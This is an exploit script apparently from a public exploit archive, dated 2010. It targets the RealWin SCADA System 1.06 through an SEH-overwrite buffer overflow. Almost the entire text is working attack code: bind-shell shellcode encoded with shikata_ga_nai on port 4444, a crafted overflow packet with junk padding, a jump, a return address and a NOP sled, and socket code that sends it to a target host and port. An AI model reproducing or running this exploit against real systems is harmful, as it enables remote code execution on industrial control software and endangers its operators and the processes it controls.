# Exploit Title: RealWin SCADA System SEH Overwrite # Date: 10-27-10 # Author: Blake # Software Link: http://www.realflex.com/products/realwin/realwin.php # Version: 1.06 # Tested on: Windows XP SP3 running in VMware Workstation (rfx)
import socket, sys
if len(sys.argv)!= 3: print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0] sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) # port 912 by default
# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai # LPORT=4444, shellcode =( "\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4" "\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81" "\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51" "\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\x1a" "\x96\x0e\x70\x61\xca\xf0\x49\xaa\x1f\xf0\x8e\xd7\xef\xa0\x47" "\x93\x5d\x55\xe3\xe1\x5d\x54\x23\x6e\xdd\x2e\x46\xb1\xa9\x84" "\x49\xe2\x01\x92\x02\x1a\x2a\xfc\xb2\x1b\xff\x1e\x8e\x52\x74" "\xd4\x64\x65\x5c\x24\x84\x57\xa0\xeb\xbb\x57\x2d\xf5\xfc\x50" "\xcd\x80\xf6\xa2\x70\x93\xcc\xd9\xae\x16\xd1\x7a\x25\x80\x31" "\x7a\xea\x57\xb1\x70\x47\x13\x9d\x94\x56\xf0\x95\xa1\xd3\xf7" "\x79\x20\xa7\xd3\x5d\x68\x7c\x7d\xc7\xd4\xd3\x82\x17\xb0\x8c" "\x26\x53\x53\xd9\x51\x3e\x3c\x2e\x6c\xc1\xbc\x38\xe7\xb2\x8e" "\xe7\x53\x5d\xa3\x60\x7a\x9a\xc4\x5b\x3a\x34\x3b\x63\x3b\x1c" "\xf8\x37\x6b\x36\x29\x37\xe0\xc6\xd6\xe2\xa7\x96\x78\x5c\x08" "\x47\x39\x0c\xe0\x8d\xb6\x73\x10\xae\x1c\x02\x16\x60\x44\x47" "\xf1\x81\x7a\x76\x5d\x0f\x9c\x12\x4d\x59\x36\x8a\xaf\xbe\x8f" "\x2d\xcf\x94\xa3\xe6\x47\xa0\xad\x30\x67\x31\xf8\x13\xc4\x99" "\x6b\xe7\x06\x1e\x8d\xf8\x02\x36\xc4\xc1\xc5\xcc\xb8\x80\x74" "\xd0\x90\x72\x14\x43\x7f\x82\x53\x78\x28\xd5\x34\x4e\x21\xb3" "\xa8\xe9\x9b\xa1\x30\x6f\xe3\x61\xef\x4c\xea\x68\x62\xe8\xc8" "\x7a\xba\xf1\x54\x2e\x12\xa4\x02\x98\xd4\x1e\xe5\x72\x8f\xcd" "\xaf\x12\x56\x3e\x70\x64\x57\x6b\x06\x88\xe6\xc2\x5f\xb7\xc7" "\x82\x57\xc0\x35\x33\x97\x1b\xfe\x43\xd2\x01\x57\xcc\xbb\xd0" "\xe5\x91\x3b\x0f\x29\xac\xbf\xa5\xd2\x4b\xdf\xcc\xd7\x10\x67" "\x3d\xaa\x09\x02\x41\x19\x29\x07")
head = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00" junk = "\x41" * 228 next_seh = "\xeb\x06\x90\x90" # overwrites next seh seh = "\xea\xe3\x02\x40" # seh overwritten at 232 bytes - 4002e3ea nops = "\x90" * 20 # nop sled junk2 = "\x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode
print "\n====================================" print "DATAC RealWin 1.06 Buffer Overflow" print "Written by Blake" print "Discovered by Luigi Auriemma" print "Tested on Windows XP SP3" print "====================================\n" print "[*] Connecting to %s on port %d" % (host,port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((host,port)) except: print "[x] Error establishing connection\n" sys.exit(0) print "[*] Sending payload" s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "\r\n") s.close() print "[*] Payload sent" raw_input("[*] Press any key to exit...\n")
|